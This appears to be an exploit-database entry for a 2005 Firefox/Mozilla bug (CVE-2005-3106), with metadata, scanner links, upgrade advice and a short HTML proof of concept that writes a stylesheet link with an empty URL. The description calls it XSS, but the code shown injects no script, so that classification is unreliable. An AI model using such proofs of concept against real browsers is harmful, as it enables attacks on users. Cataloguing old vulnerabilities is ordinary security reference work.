header-logo
Suggest Exploit
vendor:
Firefox
by:
Kubbo
7.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: Firefox
Affected Version From: Firefox 1.0.7 and below
Affected Version To: Mozilla Browser 1.7.12 and below
Patch Exists: YES
Related CWE: CVE-2005-3106
CPE: a:mozilla:firefox:1.0.7
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0101/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0101/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=21977https://www.infosecmatter.com/nessus-plugin-library/?id=20732https://www.infosecmatter.com/nessus-plugin-library/?id=117882https://www.infosecmatter.com/list-of-metasploit-windows-exploits-detailed-spreadsheet/
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2005

Firefox <= 1.0.7 and Mozilla Browser <= 1.7.12 XSS Vulnerability

A vulnerability in Firefox 1.0.7 and below and Mozilla Browser 1.7.12 and below allows remote attackers to inject arbitrary web script or HTML via a crafted link. This is due to the browser not properly sanitizing user-supplied input before using it in dynamically generated HTML pages. An attacker can exploit this vulnerability by enticing a user to click on a malicious link.

Mitigation:

Upgrade to Firefox 1.0.8 or later, or Mozilla Browser 1.7.13 or later.
Source

Exploit-DB raw data:

<!-- Tested on Firefox <= 1.0.7
             Mozilla Browser <= 1.7.12 
                         /str0ke -->

<!-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. -->

<html>
	<script language="JavaScript">
		document.write('<link rel="stylesheet" href="http://">');
	</script>
</html>

<!-- Affects Firefox 1.0.7 and below. Adaras öron är farliga. -->

# milw0rm.com [2005-10-17]

Navigation

Suggest Exploit

Services By CQR